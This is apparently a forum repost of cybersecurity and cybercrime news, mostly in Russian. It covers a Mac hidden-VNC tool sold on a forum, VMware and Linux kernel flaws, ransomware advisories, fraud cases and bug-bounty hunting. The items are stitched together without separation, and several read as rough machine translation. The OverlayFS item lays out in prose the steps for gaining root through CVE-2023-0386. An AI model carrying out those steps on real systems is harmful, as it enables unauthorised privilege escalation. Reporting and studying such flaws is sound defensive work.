28 сентября 2023 года система Leonardo подверглась масштабной хакерской атаке, из-за которой у российских авиакомпаний, в частности всей группы «Аэрофлот», «Уральских авиалиний» и Red Wings, возникли перебои с регистрацией пассажиров. Позже в «Ростехе» заявляли, что целью хакеров была остановка авиаперевозок в РФ, а сами DDOS-атаки исходили с территории нескольких стран, в том числе — Украины.
За $60 тыс. хакер получает возможность использовать устройство параллельно с пользователем.
ИБ-компания Guardz обнаружила новое вредоносное ПО, которое хакеры могут использовать для удаленного управления незащищенным Mac. В своем блоге Guardz объясняет, как с апреля 2023 года злоумышленник предлагал вредоносный инструмент на форуме в даркнете.
Вредоносная программа представляет собой утилиту hVNC (Hidden Virtual Network Computing) и похожа на VNC (Virtual Network Computing), которая является легитимным инструментом для удаленного управления другим компьютером. Разница между технологиями в том, что с HVNC доступ к компьютеру скрыт от жертвы.
HVNC продается на хакерском форуме Exploit за $60 000 за «пожизненную подписку», а за дополнительные $20 000 покупатель может получить «дополнительные вредоносные возможности в арсенал инструмента». Вредоносное ПО HVNC может работать на компьютере Mac без ведома пользователя и было протестировано на macOS с версии 10 по 13.2. (Актуальная версия - macOS Ventura 13.5).
Пост о продаже HVNC на хакерском форуме
Guardz сопоставил ключевые характеристики HVNC:
**
-Скрытая работа:** HVNC разработан для работы в скрытом режиме, что затрудняет для малого и среднего бизнеса обнаружение присутствия вредоносного ПО в системе. Скрытность позволяет киберпреступникам сохранять доступ, не вызывая подозрений.
-Постоянство: HVNC остаётся активным даже после перезагрузки системы или попытки удалить вредоносное ПО.
-Кража данных: основной целью HVNC является кража конфиденциальной информации с компьютера сотрудника, такой как учетные данные для входа, личные данные, финансовая информация или другие ценные данные.
-Удаленное управление: HVNC позволяет киберпреступникам удаленно управлять компьютерами, предоставляя полный доступ к системе.
Guardz не сообщил о каких-либо случаях использования HVNC в реальных условиях эксплуатации (In The Wild, ITW). В базе данных CVE.report нет записи о вредоносном ПО HVNC, и Apple не делала публичных комментариев.
Пользователи могут защитить себя от вредоносных программ. Первое, что нужно сделать, это обновить macOS до последней версии. У Apple есть средства защиты в macOS, и компания выпускает исправления безопасности через обновления ОС.
Для более старых версий macOS, например Monterey или Big Sur, Apple выпускает обновления безопасности отдельно. Например, 24 июля Apple выпустила обновления безопасности Monterey 12.6.8 и Big Sur 11.7.9 соответственно. Другой способ защитить себя — загружать ПО только из надежных источников – из App Store или напрямую от разработчика.
VMware has flagged that a recently patched critical command injection vulnerability in Aria Operations for Networks (formerly vRealize Network Insight) has come under active exploitation in the wild.
The flaw, tracked as CVE-2023-20887, could allow a malicious actor with network access to the product to perform a command injection attack, resulting in remote code execution.
It impacts VMware Aria Operations Networks versions 6.x, with fixes released in versions 6.2, 6.3, 6.4, 6.5.1, 6.6, 6.7, 6.8, 6.9, and 6.10 on June 7, 2023.
Now according to an update shared by the virtualization services provider on June 20, the flaw has been weaponized in real-world attacks, although the exact specifics are unknown as yet.
"VMware has confirmed that exploitation of CVE-2023-20887 has occurred in the wild," the company noted.
Data gathered by threat intelligence firm GreyNoise shows active exploitation of the flaw from two different IP addresses located in the Netherlands.
The development comes after Summoning Team researcher Sina Kheirkhah, who identified and reported the flaws, released a proof-of-concept (PoC) for the bug.
"This vulnerability comprises a chain of two issues leading to remote code execution (RCE) that can be exploited by unauthenticated attackers," Kheirkhah said.
If anything, the speed at which either state actors or financially motivated groups turn around newly disclosed vulnerabilities and exploit them to their advantage continues to be a major threat for organizations across the world.
The disclosure also follows a report from Mandiant, which unearthed active exploitation of another flaw in VMware Tools (CVE-2023-20867) by a suspected Chinese actor dubbed UNC3886 to backdoor Windows and Linux hosts.
Users of Aria Operations for Networks are recommended to update to the latest version as soon as possible to mitigate potential risks.
Zeppelin работает по RaaS-модели и нацелен на организации критической инфраструктуры.
CISA и ФБР предупредили организации США , что операторы программы-вымогателя Zeppelin могут многократно шифровать файлы. По наблюдениям ФБР, операторы Zeppelin несколько раз запускали свое вредоносное ПО в сети жертвы, что приводило к созданию разных идентификаторов или расширений файлов для каждой атаки. В результате жертве требовалось несколько уникальных ключей дешифрования.
Обнаруженный ФБР 21 июня вредонсоное ПО Zeppelin представляет собой программу- вымогатель как услугу (RaaS) и действует по крайней мере с 2019 года, ориентируясь на предприятия и организации критической инфраструктуры, такие как оборонные подрядчики и технологические компании. Также злоумышленники уделяют особое внимание организациям из сферы здравоохранения и медицины.
Они также известны кражей данных для двойного вымогательства и запросами выкупа в биткойнах, причем первоначальные требования варьируются от нескольких тысяч до более миллиона долларов.

Активность программы-вымогателя Zeppelin
ФБР также порекомендовало жертвам не платить выкуп вымогателям, поскольку у них не будет гарантии, что выплата выкупа предотвратит утечку данных или будущие атаки. Более того, уплата выкупа побудит киберпреступников атаковать больше целей и привлечет другие группировки.
Два федеральных агентства поделились тактиками, техниками и процедурами (TTP) и индикаторами компрометации (IOC) , чтобы помочь специалистам по кибербезопасности обнаруживать и блокировать атаки с использованием этого штамма программ-вымогателей.
CISA и ФБР также рекомендовали организациям принять меры для защиты от атак программ-вымогателей Zeppelin:
приоритетное исправление уязвимостей, эксплуатируемых в дикой природе;
обучение своих сотрудников и пользователей распознавать попытки фишинга и
сообщать о них;
применение многофакторной аутентификации .
source: cisa.gov/uscert/ncas/alerts/aa22-223a | ic3.gov/Media/News/2022/220811.pdf
https://krebsonsecurity[.]com/2022/01/who-wrote-the-alphv-blackcat-ransomware- strain/
**** on the news
Прокуратура Минской области поддержала в суде государственное обвинение по уголовному делу в отношении 28-летнего жителя Борисова, которому инкриминировано содействие экстремистской деятельности.
В ходе судебного следствия установлено, что обвиняемый, зная о деятельности экстремистского формирования «Кибер-Партизаны», 18 января 2023 года направил в чат-бот Теlegram разработанную им программу, которая позволяла шифровать файлы на компьютере пользователя. Тем самым программа закрывала доступ к зашифрованной информации пользователя.
Он же разработал и 28 января 2023 года направил в чат-бот Теlegram экстремистского формирования «Кибер-Партизаны» инструкцию для активации программы, которая являлась набором драйверов для разработки программного обеспечения с целью фильтрации файловой системы.
В судебном заседании молодой человек признал свою вину в полном объеме.
С учетом представленных государственным обвинителем доказательств Минский областной суд постановил обвинительный приговор. На основании ч.ч.1, 2 ст.361-4 Уголовного кодекса Республики Беларусь обвиняемому назначено наказание в виде ограничения свободы с направлением в исправительное учреждение открытого типа на срок 4 года 6 месяцев.
В соответствии с ч.1 ст.46-1 Уголовного кодекса Республики Беларусь ноутбук, использованный обвиняемым при совершении преступлений, подвергнут специальной конфискации.
В решении от 8 октября, вынесенном федеральным судом Лас-Вегаса, судья Глория Наварро приговорил Дэвида Кагеля после того, как он признал себя виновным по одному пункту обвинения в сговоре с целью совершения товарного мошенничества в мае.
Кагель в настоящее время находится в хосписе в учреждении для престарелых в Лас-Вегасе из-за слабого здоровья, где он будет отбывать испытательный срок, если не уйдет, и где он будет обязан носить устройство мониторинга.
Государственные прокуроры, предъявившие Кагелу обвинения в прошлом году, заявили, что с декабря 2017 года по июнь 2022 года Кагель и двое его сообщников заманивали жертв в инвестирование в мошенническую схему торговли криптовалютными ботами, обещая высокую прибыль и отсутствие риска.
За это время троица «мошенническим образом продвигала и добивалась инвестиций и получила как минимум около 15 миллионов долларов в виде средств жертв- инвесторов для различных программ торговли криптовалютой», заявили прокуроры.
Кагель способствовал распространению мошенничества с криптовалютой, составляя письма на фирменном бланке своей юридической фирмы, которые затем отправлялись жертвам.
По словам прокуроров, официальные бланки помогли создать доверие.
У жертв сложилось впечатление, что они инвестировали в законную схему, в которой использовались торговые боты для инвестирования в рынки криптовалют.
По теме: Основатель криптовалютной схемы «Понци» IcomTech приговорен к 10 годам тюремного заключения
Схема «гарантировала» возврат основной суммы инвестиций и прибыль от 20% до 100% от основной суммы инвестиций в течение 30 дней.
Кагель утверждал, что в январе 2018 года у него было 1000 Биткоин (BTC) в кошельке на сумму 11 миллионов долларов, которые хранились на условном депонировании для гарантии инвестиций. Он также ложно заявил, что раньше инвестировал в криптовалюту, чтобы повысить доверие к брокеру.
В 2023 году Верховный суд Калифорнии отозвал юридическую лицензию Кагеля за неспособность отреагировать на дисциплинарные обвинения, заявив, что он незаконно присвоил 25 000 долларов из средств клиентов.
Ранее его юридическая лицензия была приостановлена дважды: в 1997 и 2012 годах.
Оба предполагаемых сообщника Кагеля, Дэвид Саффрон и Винсент Маццотта, не признали себя виновными и ожидают суда в федеральном суде Лос-Анджелеса в апреле следующего года.
courtlistener.com/docket/68229207/united-states-v-
kagel/?filed_after=&filed_before=&entry_gte=&entry_lte=&order_by=desc#entry-40
storage.courtlistener.com/recap/gov.uscourts.cacd.889787/gov.uscourts.cacd.889787.1.0.pdf
Британская полиция задержала предполагаемого взломщика платформы для запуска мем-токенов Pump.fun на Solana. Об этом пишет Blockworks.
17 мая команда заявила, что эксплойт с ущербом в $1,9 млн совершил экс- сотрудник фирмы, воспользовавшись «привилегированным положением». Глава отдела исследований Wintermute Игорь Игамбердиев подтвердил, что инцидент связан с компрометацией закрытых ключей и пользователем X под ником staccoverflow.
Последним оказался гражданин Канады Джаретт Данн, бывший разработчик Pump.fun.
По словам собеседника издания, знакомого с ходом поисков, занималась ими частная детективная фирма, нанятая третьей стороной. Он также подтвердил, что широко разошедшийся в интернете скриншот аккаунта Данна на Binance является подлинным.
__https://twitter.com/x/status/1791882191229591666
Источник Blockworks рассказал, что изначально сыщики локализовали его приблизительное местоположение в Лондоне с помощью соцсетей. Затем последовала «массовая охота» с использованием местных агентов, нанятых по контракту.
В конечном итоге Данна обнаружили в отеле Middle Eight в районе Ковент-Гарден, где он и был арестован.
Впоследствие подозреваемого выпустили под залог, о чем он сам сообщил в другом аккаунте в X. Информацию подтвердили в детективной фирме.
__https://twitter.com/x/status/1791968019322638835
Ожидается, что Данн останется в Великобритании до следующего судебного заседания в августе.
Сотрудник департамента полиции Лос-Анджелеса (штат Калифорния) был арестован по подозрению в краже и мошенничестве после того, как воспользовался украденной им самим карточкой для покупки товаров для дома. 42-летний Эдмонд Бабайанс (Edmond Babaians) кража пластика была совершена прямо в отделении у одной из посетительниц.
Обратившаяся в полицию женщина изначально не подозревала, что сама стала жертвой копов. Она пришла к следователям с жалобой на несколько несанкционированных ею транзакций, что подтвердили выписки из банка и фотографии системы безопасности магазина, на которых виден мужчина, использующий ее карту.
Изучившие фотографии следователи с удивлением опознали на них своего сослуживца. Точная сумма потраченных им денег остается неизвестной, однако, судя по тому, что расследованию присвоен статус уголовного, речь идет как минимум о 950 долларах. Глава полиции города была вынуждена выступить с официальным заявлением, в котором отметила, что офицер подорвал доверие населения, и это — крайне тревожный сигнал. Дело приобрело настолько широкий общественный резонанс, что с осуждением действий Бабайанса выступила также мэр города.
Сам Бабайанс проработал офицером полиции 16 лет. В последнее время он был приписан к одной из местных тюрем, где в итоге и был арестован. Сейчас он освобожден под подписку о невыезде, также полицейскому пришлось внести залог.
source: latimes.com/california/story/2023-08-09/lapd-officer-arrested-after- stolen-credit-card-used-at-store
В Петербурге накрыли крупный наркошоп, который торговал веществами в 21 регионе. Силовики задержали его организатора, владельцев плантаций и даже бухгалтера.
Gagarin Shop работал ещё с 2020 года на «Гидре», однако с её закрытием перебрался на новую площадку в даркнете. Там до недавнего времени наркошоп торговал целым арсеналом веществ: от кокаина до МДМА. Причём за время своего существования магазин вышел на серьёзные обороты, и его география охватывала 21 российский регион, включая Москву Крым и Хабаровский край.
Накрыть дружный коллектив Gagarin Shop силовикам удалось в ходе антинаркотической операции «Канал-Невский щит». По её итогам в Петербурге задержали 58-летнего организатора наркошопа, админа интернет-магазина, бухгалтера, владельцев плантаций марихуаны, перевозчика веществ и обычного закладчика. Бонусом к этому по изъятым из магазина координатам нашли аж 738 закладок — и это только в Петербурге и Ленобласти.
У самых успешных участников сотрудников дома нашли не только заготовленные наркотики, но также Porsche и Lexus. Впрочем, в ближайшие годы автомобили им не понадобятся: персоналу Gagarin Shop, наряду с традиционной 228-й статьёй, теперь грозит дело о преступном сообществе — за его создание и участие светит до двадцати и десяти лет соответственно.
В ядре Linux в реализации файловой системы OverlayFS выявлена уязвимость ([CVE-2023-0386](https://security- tracker.debian.org/tracker/CVE-2023-0386)), которую можно использовать для получения root-доступа на системах, в которых установлена подсистема FUSЕ и разрешено монтирование разделов OverlayFS непривилегированным пользователем (начиная с ядра Linux 5.11 с включением непривилегированных user namespace). Проблема устранена в ветке ядра 6.2.
Атака производится через копирование файлов с флагами setgid/setuid из раздела, примонтированного в режиме nosuid, в раздел OverlayFS, имеющий слой, связанный с разделом, допускающим выполнение suid-файлов. Уязвимость близка к проблеме CVE-2021-3847, выявленной в 2021 году, но отличается более низкими требованиями к эксплуатации - в старой проблеме требовались манипуляции с xattrs, которые ограничены при использования пространств имён идентификаторов пользователя (user namespace), а в новой проблеме используются биты setgid/setuid, которые специально не обрабатываются в user namespace.
Алгоритм совершения атаки:
• При помощи подсистемы FUSE монтируется ФС, в которой имеется принадлежащий пользователю root исполняемый файл с флагами setuid/setgid, доступным всем пользователям на запись. При монтировании FUSE выставляет режим "nosuid".
• Отменяются (unshare) пространства имён пользователей и точек монтирования (user/mount namespace).
• Монтируется OverlayFS с указанием ранее созданной в FUSE ФС в качестве нижнего слоя и верхним слоем на базе каталога, допускающего возможность записи. Каталог верхнего слоя должен размещаться в ФС, при монтировании которой не используется флаг "nosuid".
• Для suid-файла в FUSE-разделе утилитой touch меняется время модификации, что приводит к его копированию в верхний слой OverlayFS.
• При копировании ядро не убирает флаги setgid/setuid, что приводит к тому, что файл появляется в разделе, допускающем обработку setgid/setuid.
• Для получения прав root достаточно запустить файл с флагами setgid/setuid из каталога, прикреплённого к верхнему слою OverlayFS.
Дополнительно можно отметить [раскрытие](https://bugs.chromium.org/p/project- zero/issues/detail?id=2439&can=2&q=&colspec=ID%20Type%20Status%20Priority%20Milestone%20Owner%20Summary&cells=ids) исследователями из команды Google Project Zero сведений о трёх уязвимостях, которые были исправлены в основной ветке ядра Linux 5.15, но не были перенесены в пакеты с ядром из RHEL 8.x/9.x и CentOS Stream 9.
• CVE-2023-1252 - обращение к уже освобождённой области памяти в структуре ovl_aio_req при одновременном совершении нескольких операций в OverlayFS, развёрнутой поверх ФС Ext4. Потенциально уязвимость позволяет повысить свои привилегии в системе.
• CVE-2023-0590 - обращение к уже освобождённой области памяти в функции qdisc_graft(). Предполагается, что эксплуатация ограничивается аварийным завершением.
• CVE-2023-1249 - обращение к уже освобождённой области памяти в коде записи coredump, возникающее из-за пропущенного вызова mmap_lock в file_files_note. Предполагается, что эксплуатация ограничивается аварийным завершением.
Преступники обманывали уже обманутых людей.
Национальная полиция Украины (НПУ) ликвидировала преступную сеть колл-центров , которая занималась финансовыми аферами и была нацелена на жертв мошенничества с криптовалютой под видом помощи в возврате украденных средств.
Мошенники также предположительно причастны к обману граждан Украины и стран Евросоюза, заинтересованных в инвестициях в криптовалюту, ценные бумаги, золото и нефть.
Преступники использовали специализированное ПО и высокотехнологичное оборудование, позволяющее подделывать номера телефонов государственных банковских организаций.
Согласно расследованию НПУ, сотрудники колл-центров выдавали себя за сотрудников банков и заставляли жертв назвать данные банковских карт.
Злоумышленники использовали ранее созданные сайты и биржи для торговли криптовалютой, фиатной валютой, ценными бумагами, золотом и нефтью для привлечения средств иностранных граждан, гарантируя получение «сверхприбыли в короткие сроки».
Утверждая, что они являются членами «Сообщества криптовалютных брокеров», злоумышленники также связывались с жертвами других криптовалютных мошенников и обещали им помочь вернуть украденные средства за комиссию. Однако, мошенники «пропали» после того, жертвы перевели им деньги на счета.
Украинские правоохранители провели санкционированные обыски в нескольких колл- центрах и конфисковали компьютерное оборудование, мобильные телефоны и все записанные данные.
Преступники обвиняются в участии в организованной преступной группе, мошенничестве и использовании вредоносного ПО, и им грозит до 12 лет лишения свободы.
source: npu.gov.ua/news/kiberzlochini/naczpolicziya-vikrila-merezhu-call- czentriv-figuranti-speczializuvalisya-na-finansovix-aferax/
Результаты отчета ENISA заставляют беспокоиться, так как вымогательские атаки становятся все разрушительнее.
Согласно отчету ENISA (Европейское агентство по сетевой и информационной безопасности), текущее количество сообщений об атаках с использованием программ-вымогателей не дает точного представления о том, что происходит на самом деле, поскольку жертвы просто не желают рассказывать о случившемся.
Проанализировав 623 вымогательские атаки, произошедшие в период с мая 2021
года по июнь 2022 года, аналитики пришли к мрачным выводам:
вымогательское ПО стало эффективнее, а атаки – разрушительнее. По данным
ENISA, в 94,2% всех проанализированных инцидентов не удалось подтвердить, был
ли уплачен выкуп. Эксперты считают, что не сообщая об атаках вымогателей,
компании пытаются сохранить имидж. Из-за этого ИБ-специалистам тяжелее
анализировать ландшафт угроз, расследовать произошедшие инциденты и
разрабатывать защитные решения, чтобы предотвратить будущие кибератаки.
В своем отчете ENISA призывает организации подготовиться к атакам
кибервымогателей и изучить их возможные последствия.
“Хакеры атакуют всех без разбора. Пострадали как маленькие, так и крупные
компании во всех отраслях. Любой человек или организация могут стать мишенью
злоумышленников”
говорят аналитики ENISA.
Кроме мрачной статистики, в отчете агентства перечислены простые, но важные шаги, которые организации могут предпринять для защиты своих сетей от вымогателей и киберугроз:
source: enisa.europa.eu/publications/enisa-threat-landscape-for-ransomware- attacks
Спустя почти 4 года (Четыре, Карл!!!) после того, как Джеймс Форшоу, исследователь из команды Google Project Zero, [опубликовал запись в блоге](https://googleprojectzero.blogspot.com/2018/08/windows-exploitation- tricks-exploiting.html) с подробным описанием нового эксплойта в механизме безопасности Windows Protected Process Light (PPL), Microsoft добавила меры по смягчению этой техники в сборках Windows 10 и Windows 11.
Неаффишированные патчи были обнаружены в прошлом месяце пользователем GitHub и [подтверждены](https://itm4n.github.io/the-end-of- ppldump/) в течение недели Клементом Лабро, французским пентестером и автором PPLdump, инструмента, который использует и автоматизирует атаки PPL с использованием техники Forshaw 2018 года.
Добавленные в Windows 8.1 в середине 2013 года, PPLпредставляют собой особый класс процессов, которые защищены и не могут быть изменены обычными процессами Windows, даже если эти процессы выполняются с правами SYSTEM/administrator. Только другие PPL или PP (защищенные процессы) могут взаимодействовать с PPL.
PPL вместе с PP выступали способом защиты служб Windows и даже сторонних приложений, обрабатывающих конфиденциальные операции. Для статуса PPL необходима регистрация в Microsoft, аутентификация и авторизация, после чего можно использовать специальный драйвер ELAM, который предоставляет процессу статус PPL.
Наиболее распространенными пользователями PPL были производители антивирусного ПО.
И PP, и PPL защищали свои процессы, загружая только файлы DLL, которые были подписаны соответствующим образом и из небольшого списка местоположений на диске, при этом PPL также разрешалось загружать DLL из расположения кэша памяти, известного как KnownDlls.
В 2018 году Форшоу обнаружил, что существует способ злоупотребления механизмом загрузки, позволяя не-PPL создавать дамп памяти процессов PPL и открывая дверь для захвата PPL злоумышленником.
В то время как Microsoft выпустила исправление в то время, инструмент PPLdump использовал другие способы исполнения первоначальной техники — вплоть до этого месяца.
Хотя это, безусловно, хорошая новость, но не следует исключать возможности поиска новых способов атаки на механизм безопасности Microsoft PPL.
Ресерчеры уже указывают на то, что есть пара других вариантов, которые, вероятно, все еще можно использовать для потенциальных атак.
Но, и в этом случае для Microsoft - это не новость, ведь выпуск патча на патч
Предоставлено: Джейк Хокинс для The Telegraph
19-летний парень сидел за своим столом, не сводя глаз с экрана. На нем был корпоративный веб-сайт. На первый взгляд это была просто еще одна невзрачная веб-страница, возможно, немного более разреженная, чем красочные платформы социальных сетей, которые он мог бы просматривать.
Но на самом деле американский подросток получил доступ к ТАТ-14. подводная телекоммуникационная кабельная система. До декабря 2020 года этот жизненно важный глобальный торговый канал протянулся более чем на 9 500 миль между Францией, Германией, Данией, Нидерландами, Великобританией и США.
«Я наткнулся на этот веб-сервер. И название было очень интересным. Поэтому я хотел посмотреть, смогу ли я его взломать», — говорит Корбен Лео.
Его метод был поразительно прост: Лео перешел на очень конкретный веб-адрес и
дважды обновил страницу. Благодаря до сих пор необнаруженной уязвимости веб-
сайт рассматривал его компьютер так, как будто он вошел в систему с учетной
записью администратора.
Это дало ему тот же уровень контроля, что и владельцам ТАТ-14, положившим
пальцы на артерию трансатлантической торговли в марте 2019 года. И никто не
знал, что он там был.
Хак Лео — лишь один из многих. глобальное сообщество исследователей баг-
баунти: этичные хакеры, которые исследуют веб-серверы компаний на наличие
брешей в безопасности — багов — и затем сообщают о своих выводах владельцам,
как правило, в обмен на плату.
«Я мог бы добавить доступ администратора ко всем их учетным записям. Я мог ими
управлять, у меня был доступ ко всей внутренней документации кабелей», —
говорит Лео.
«Все, что было связано с внутренней работой кабеля, его физической структурой,
периодами обслуживания».
В то время он еще не был настолько взрослым, чтобы даже купить пиво, он мог бы
спровоцировать обвалы фондового рынка, нарушение работы правительств или
спровоцированные обвинения в международном шпионаже.
Вместо этого он говорит: «Я сообщил об этом телекоммуникационной компании в
рамках их программы безопасности.
«Я не не пытайтесь сделать слишком много, потому что это был подводный кабель.
Я боялся, что меня бросят на черный сайт ЦРУ!»
Прибыльное времяпрепровождение
Для самых опытных хакеров вознаграждение за обнаружение ошибок может стать
прибыльным времяпрепровождением. Лео, которому сейчас 22 года, утверждает, что
заработал «около миллиона долларов» на своих исследованиях. Как
квалифицированный ученый-компьютерщик, теперь он руководит собственной фирмой
по кибербезопасности, которая сотрудничает с Министерством обороны США.
Глобальная киберпреступность обходится компаниям примерно в 1 триллион
долларов (800 миллиардов фунтов стерлингов) в год, согласно Bugcrowd,
краудсорсинговой платформе безопасности, которая выступает в качестве
посредника между хакерами и компаниями, которым нужны их услуги.
Бизнес-модель выросла вокруг этой цифры: вместо того, чтобы тратить эти деньги
на исправление ущерба после события, почему бы не заплатить их тем, кто охотно
расскажет вам, где ваши слабые места?
В результате большие деньги плавают по миру баг-баунти. HackerOne, например,
заявляет, что в прошлом году выплатила почти 37 миллионов долларов своим 1,5
миллионам участников, или хакерам.
Среди клиентов, обращающихся за хакерскими услугами, — Goldman Sachs, Uber,
Twitter и Starbucks, а Bugcrowd работает с Nintendo, Pinterest и даже с
компаниями, занимающимися кибербезопасностью, такими как Proofpoint.
Мартен Микос, исполнительный директор HackerOne, описывает компанию из Сан-
Франциско как «посредника доверия между хакерами, с одной стороны, и
клиентами, с другой». Хакеры, которых он использует, говорит он, — это «люди,
которые могут быть бесконечно любопытными».
«Они являются экспертами в области кибербезопасности, они очень целеустремленные, они точно знают, сколько они зарабатывают. Они следят за наградами».
Кейси Эллис, исполнительный директор Bugcrowd, говорит, что схемы
вознаграждения за обнаружение ошибок привлекают хитрых и квалифицированных
специалистов: «Причина, по которой я основал компанию, заключалась в том,
чтобы один человек мог последовательно перехитрить всех потенциальных
противников, которые там.»
Австралийский хакер, ставший руководителем, сравнивает Bugcrowd со службой
онлайн-знакомств, сопоставляя компании с «людьми, которые могут сломать
компьютеры». Мотивы для участия в исследовании Bug Bounty могут быть разными.
И HackerOne, и Bugcrowd говорят, что их участники ссылаются на деньги, которые
можно заработать, в то время как другие используют их, чтобы создать свой опыт
работы в качестве «трамплина» в индустрии кибербезопасности.
«Нацелены на справедливость»
Mickos говорит, что некоторые из участников HackerOne «сосредоточены на
справедливости», добавив, что компания отказалась от обслуживания российских и
белорусских клиентов после вторжения первых в Украину.
Выплаты участникам могут варьироваться от нескольких сотен фунтов за
незначительную ошибку до шестизначной суммы за серьезные ошибки, такие как та,
которая привела Лео к ТАТ-14. Эллис из Bugcrowd утверждает, что средняя
выплата составляет четыре цифры.
Иногда индустрия может быть противоречивой: в 2019 году Василий Кравец,
участник HackerOne, обнаружил две ошибки в игровом программном обеспечении
Steam от Valve Corporation. Уязвимость сделала десятки миллионов компьютеров
по всему миру уязвимыми для взлома или заражения вирусами. Valve сначала
отмахнулась от выводов Кравца, что спровоцировало напряженное противостояние,
в ходе которого хакер заявил, что опубликует ошибки. Затем Valve исправила
ошибки.
В том же году конкурирующая компания, занимающаяся кибербезопасностью,
заявила, что 1 процент лучших участников HackerOne зарабатывает всего около 26
500 фунтов стерлингов в год. Босс HackerOne Микос говорит, что исследование
«основано только на фрагменте» данных HackerOne, что указывает на то, что они
обычно получают больше за свои усилия.
Во всех разговорах о «белых хакерах», которые хотят «делать добро в мире»,
есть определенный основной акцент на предлагаемом финансовом вознаграждении.
Эллиса смущает предположение, что зарабатывать миллионы на исследованиях в
области кибербезопасности — это нечто исключительное. «Если у вас есть
возможность сделать это в первую очередь, и вы делали это в течение некоторого
времени, миллион долларов на самом деле не так уж сложно», — пожимает он
плечами.
HackerOne. говорит, что создала девять миллионеров, а более дюжины других
участников заработали более 500 000 долларов за всю жизнь через платформу.
Что касается кабельного хакера Лео, он с радостью признает, что исследования
по поиску ошибок «приносят мне абсурдная сумма».
Отвечая на вопрос о будущем, он говорит: «Я хотел бы продолжать делать вознаграждения за ошибки на стороне, а затем запустить стартап. Поэтому я подумывал об обучении разработчиков безопасному коду и создании платформы для этого».
Высококвалифицированные хакеры могли бы зарабатывать на жизнь исследованием ошибок, но как только деньги будут возможно, старая поговорка о браконьерах, ставших егерями, начинает сбываться.
Районный суд в Санкт-Петербурге разрешил следствию наложить арест на 24 криптокошелька обвиняемого по делу о краже валюты Ethereum.
Районный суд в Санкт-Петербурге разрешил следствию наложить арест на 24 криптокошелька обвиняемого по делу о краже валюты Ethereum (эфириум, ETH). Об этом сообщила во вторник объединенная пресс-служба судов Санкт-Петербурга, указав, что решение является прецедентом в российской судебной практике.
Название районного суда не уточняется в целях неразглашения данных предварительного расследования. "Криптовалюта используется как средство платежа, инвестиций и накопления сбережений, то есть имеет материальную ценность, соответственно, признается судом как иное имущество и свидетельствует о наличии предмета преступления по смыслу примечания к ст. 158 УК РФ ("Кража"), на которое может быть наложен арест", - передали в пресс- службе обоснование решения судом.
Инстанция указала, что по сути основным отличием криптоденег от денег является "только способ их возникновения", а поскольку понятие криптовалюты не закреплено законодательно, обозначение ее как иное имущество в обвинении и в ходатайстве об аресте допустимо. Расследуемое уголовное дело возбуждено по ч. 2 ст. 272 УК РФ ("Неправомерный доступ к компьютерной информации"), п. "б" ч. 4 ст. 158 УК РФ ("Кража в особо крупном размере").
Потерпевший обратился в правоохранительные органы после того, как обвиняемый (он находится в розыске) заблокировал доступ к его криптокошельку с 7 тыс. ЕТН, приобретенными в 2017 году. Используя неустановленные технические средства, злоумышленник произвел незаконный перевод ЕТН на свой кошелек. Следствие установило, что в кластере адресов криптовалюты обвиняемого содержатся 24 криптокошелька с эфириумом потерпевшего в объеме неистраченных 4 тыс. ЕТН (более 1 млрд рублей). Эти кошельки и разрешил арестовать суд, указав, что содержащаяся в них криптовалюта может быть обращена к взысканию по исполнительным документам с учетом положений ст. 446 ГПК РФ (устанавливает перечень имущества, на которое такое взыскание не может быть обращено).
source: tass.ru/proisshestviya/14284007
В январе 2021 года стало известно, что ИБ-компания Malwarebytes пострадала от рук тех же хакеров, что атаковали компанию SolarWinds. При этом подчеркивалось, что Malwarebytes вообще не пользовалась продуктами SolarWinds, не устанавливала зараженную малварью версию Orion, а злоумышленники использовали «другой вектор вторжения», чтобы получить доступ к ее внутренним письмам.
Теперь Брэндон Уэльс (Brandon Wales), исполняющий обязанности главы Агентства по кибербезопасности и защите инфраструктуры, организованного при Министерстве внутренней безопасности США (DHS CISA), заявил, что в целом около трети компаний, атакованных этими хакерами, не имели прямого отношения к SolarWinds.
«[Хакеры] получали доступ к своим целям разными способами. Эти злоумышленники проявили изобретательность... Совершенно верно, что эту кампанию нельзя рассматривать как часть кампанию против SolarWinds», — говорит Уэльс.
Click to expand...
Так, во многих случаях злоумышленники проникали в сети своих жертв, используя технику password spraying для взлома отдельных учетных записей электронной почты в целевых организациях. Проникнув в систему, хакеры применяли множество сложных атак, направленных на повышение привилегий и обход аутентификации в облачных сервисах Microsoft. К примеру, еще одна цель этих атак, компания CrowdStrike, заявила, что злоумышленник безуспешно пытался прочитать ее электронную почту, используя взломанный аккаунт реселлера Microsoft, с которым работала компания.
По данным The Wall Street Journal, специалисты SolarWinds в настоящее время изучают возможность того, что именно проблемы в продуктах Microsoft стали основным вектором проникновения злоумышленников в сеть компании. Хотя в декабре прошлого года представители Microsoft заявляли, что злоумышленники получили доступ к корпоративной сети компании и добрались до внутренних исходников, но не было обнаружено никаких признаков того, что системы Microsoft использовались для атак на другие компании и организации.
Напомню, что атаку на SolarWinds приписывают предположительно русскоязычной хак-группе, которую ИБ-эксперты отслеживают под названиями StellarParticle (CrowdStrike), UNC2452 (FireEye) и Dark Halo (Volexity).
В декабре 2020 года стало известно, что неизвестные злоумышленники атаковали компанию SolarWinds и заразили ее платформу Orion малварью. Согласно официальным данным, среди 300 000 клиентов SolarWinds только 33 000 использовали Orion, а зараженная версия платформы была установлена примерно у 18 000 клиентов. В результате среди пострадавших оказались такие гиганты, как Microsoft, Cisco, FireEye, а также множество правительственных агентств США, включая Госдеп и Национальное управление по ядерной безопасности.
Источник: xakep.ru/2021/02/01/not-solarwinds-victims/
Жертвам предлагается скачать файл образа диска "ArcSetup.dmg", который также содержит Atomic Stealer. После загрузки вредонос выдает фейковое окно для ввода пароля администратора, что позволяет киберпреступникам получить доступ к данным.
Эта новая кампания затрудняет обнаружение порталов из-за специальных пригласительных ссылок. Пользователям следует быть осторожными и избегать сомнительных загрузок, чтобы избежать утечки данных и защитить свою систему от вредоносного ПО.
Верховный суд РФ рассмотрел дело о хакерской атаке на бизнес-компанию: обвиняемый вскрыл информацию на 17 серверах общества, в том числе получил неправомерный доступ к коммерческой тайне и персональным данным, и написал руководству электронное письмо, в котором угрожал заблокировать и уничтожить компьютерные системы, если не получит выкуп в виде биткоинов – 2 единицы, стоимость которых оценивалась в более 1 миллиона рублей.
